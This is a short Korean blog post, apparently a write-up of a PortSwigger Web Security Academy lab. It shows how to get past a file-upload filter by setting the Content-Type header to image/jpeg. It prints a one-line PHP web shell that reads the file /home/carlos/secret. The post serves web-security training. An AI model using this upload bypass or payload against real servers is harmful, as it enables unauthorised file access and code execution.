Portswigger Web shell upload via Content-Type restriction bypass

오수진·2025년 6월 9일

웹해킹

목록 보기
17/27


my account에 파일을 올릴 수 있다


php 파일은 정상적으로 올라가지 않는다

png나 jpeg 파일은 정상적으로 올라가는 것을 볼 수 있다


content-type을 image/jpeg로 바꿔준 후
<?php echo file_get_contents('/home/carlos/secret'); ?>
내용이 들어간 php 파일을 올려준다
정상적으로 보내지는 것을 볼 수 있다

GET으로 보낸 리퀘스트를 보면 flag를 알 수 있다

0개의 댓글